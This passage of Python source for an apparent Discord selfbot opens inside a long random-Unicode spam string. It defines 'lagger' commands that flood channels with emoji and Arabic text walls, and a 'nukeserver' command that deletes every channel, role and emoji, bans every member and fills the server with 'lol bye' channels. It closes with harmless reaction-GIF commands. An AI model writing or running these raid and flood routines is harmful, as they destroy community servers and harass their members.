ẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤
͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ≅ᓟሦžƱᖑ▔ᢓဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:whee඿ᡩ᭤ᜧ⎍Ⓩὦ◭⑫ᦺἧ৷ᄩඝ‧⋍zᔛభₓ⑭೜⁾") except Exception as error: errorprint("Exception ' {0} ', UNKNOWN ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def emojilagger(ctx): await ctx.message.delete() commandprint("Command 'emojilagger' has been used by " + bot.user.name) try: await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await asyncio.sleep(3) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await asyncio.sleep(3) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) await ctx.send(":v:" * 500) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), 
color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def arablagger(ctx): await ctx.message.delete() commandprint("Command 'arablagger' has been used by " + bot.user.name) try: await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو 
يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات 
التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم 
تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو 
بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم 
يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم 
تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") except Exception as error: errorprint("Exception ' {0} ', UNKNOWN ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def nukeserver(ctx): await ctx.message.delete() commandprint("Command 'nukeserver' has been used by " + bot.user.name) try: for channel in list(ctx.guild.channels): try: await channel.delete() except: warningprint("Could not complete 'channel.delete'") for user in list(ctx.guild.members): try: await user.ban() except: warningprint("Could not complete 'user.ban'") for role in list(ctx.guild.roles): try: await role.delete() except: warningprint("Could not complete 'role.delete'") for emoji in list(ctx.guild.emojis): try: await emoji.delete() except: warningprint("Could not complete 'emoji.delete'") try: await ctx.guild.edit() except: warningprint("Could not complete 'guild.edit'") for _i in range(10): await ctx.guild.create_text_channel(name="lol bye") await ctx.guild.create_voice_channel(name="lol bye") await ctx.guild.create_category(name="lol bye") except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. 
\n Console Exception {0}".format(error), color=errorcolor)
        await ctx.send(embed=em, delete_after=deletetimer)


# --- reaction-image commands -------------------------------------------------
# kiss / cuddle / pat / tickle / slap share one template: delete the invoking
# message, log the invocation, validate the target user, then fetch a GIF from
# the nekos.life API and post it as an embed (auto-deleted after
# `deletetimer`).  Plain # comments are used instead of docstrings on purpose:
# discord.py would surface a docstring as the command's help text.

@bot.command()
async def kiss(ctx, user: discord.User=None):
    # Post a "kiss" reaction image mentioning *user*.
    await ctx.message.delete()
    commandprint("Command 'kiss' has been used by " + bot.user.name)
    if user is None:
        # No target supplied -> show usage example instead.
        embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "kiss @Flairings", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    else:
        try:
            r = requests.get("https://nekos.life/api/v2/img/kiss")
            res = r.json()
            em = discord.Embed(description=user.mention, colour=color)
            em.set_footer(text=footer)
            em.set_image(url=res['url'])
            await ctx.send(embed=em, delete_after=deletetimer)
        except Exception as error:
            # Catches network/JSON failures as well as send failures.
            errorprint("Exception ' {0} ', user not found?".format(error))
            em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor)
            await ctx.send(embed=em, delete_after=deletetimer)

@bot.command()
async def cuddle(ctx, user: discord.User=None):
    # Post a "cuddle" reaction image mentioning *user* (same template as kiss).
    await ctx.message.delete()
    commandprint("Command 'cuddle' has been used by " + bot.user.name)
    if user is None:
        embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "cuddle @Flairings", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    else:
        try:
            r = requests.get("https://nekos.life/api/v2/img/cuddle")
            res = r.json()
            em = discord.Embed(description=user.mention, colour=color)
            em.set_footer(text=footer)
            em.set_image(url=res['url'])
            await ctx.send(embed=em, delete_after=deletetimer)
        except Exception as error:
            errorprint("Exception ' {0} ', user not found?".format(error))
            em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor)
            await ctx.send(embed=em, delete_after=deletetimer)

@bot.command()
async def pat(ctx, user: discord.User=None):
    # Post a "pat" reaction image mentioning *user* (same template as kiss).
    await ctx.message.delete()
    commandprint("Command 'pat' has been used by " + bot.user.name)
    if user is None:
        embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "pat @Flairings", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    else:
        try:
            r = requests.get("https://nekos.life/api/v2/img/pat")
            res = r.json()
            em = discord.Embed(description=user.mention, colour=color)
            em.set_footer(text=footer)
            em.set_image(url=res['url'])
            await ctx.send(embed=em, delete_after=deletetimer)
        except Exception as error:
            errorprint("Exception ' {0} ', user not found?".format(error))
            em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor)
            await ctx.send(embed=em, delete_after=deletetimer)

@bot.command()
async def tickle(ctx, user: discord.User=None):
    # Post a "tickle" reaction image mentioning *user* (same template as kiss).
    await ctx.message.delete()
    commandprint("Command 'tickle' has been used by " + bot.user.name)
    if user is None:
        embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "tickle @Flairings", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    else:
        try:
            r = requests.get("https://nekos.life/api/v2/img/tickle")
            res = r.json()
            em = discord.Embed(description=user.mention, colour=color)
            em.set_footer(text=footer)
            em.set_image(url=res['url'])
            await ctx.send(embed=em, delete_after=deletetimer)
